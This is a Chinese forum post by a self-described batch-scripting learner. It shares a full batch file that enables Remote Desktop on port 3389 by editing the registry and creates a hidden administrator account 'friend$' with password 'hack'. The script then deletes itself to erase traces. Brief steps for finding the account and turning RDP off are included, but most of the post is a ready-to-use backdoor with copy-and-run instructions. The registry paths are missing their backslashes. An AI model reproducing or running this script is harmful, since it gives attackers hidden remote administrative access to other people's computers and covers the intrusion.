呵呵,很高兴来到这里学习,今后希望大家多多指教。
我在学习dos命令和批处理时,突发奇想,就将原来的只能打开3389端口的批处理加强了一下,增加了建立隐藏账户并提权为管理员的功能,打开后此文件会自动删除!~
****************************************************************************
1.批处理功能说明:
该批处理双击打开执行后,会完全自动打开3389端口,建立一个叫做” friend$ “的用户,密码为:” hack “,并提升为管理员权限,且一般在命令提示符下用net user 查看是看不到所建立的账户的。并且当执行完毕后自定删除该文件销毁痕迹。
2.查看及删除隐藏账户方法:
要想查看此隐藏账户,可以在我的电脑——右键属性——管理——用户和组中看到所建立的账户。(可以在这个地方删除所建立的隐藏账户)
3.关闭打开的3389端口方法:
测试环境:windows7
我的电脑——右键属性——高级系统设置——远程选项卡——将远程桌面前的对勾去掉即可。
测试环境:windows xp
我的电脑——右键属性——远程选项卡——将远程桌面前的对勾去掉即可。
4.使用方法:
将以下代码复制到记事本中后将文件重命名为:3389+管理员提权批处理.bat
@echo off echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg net user friend$ hack /add net localgroup administrators friend$ /add del 3389.reg del 3389+管理员提权批处理.bat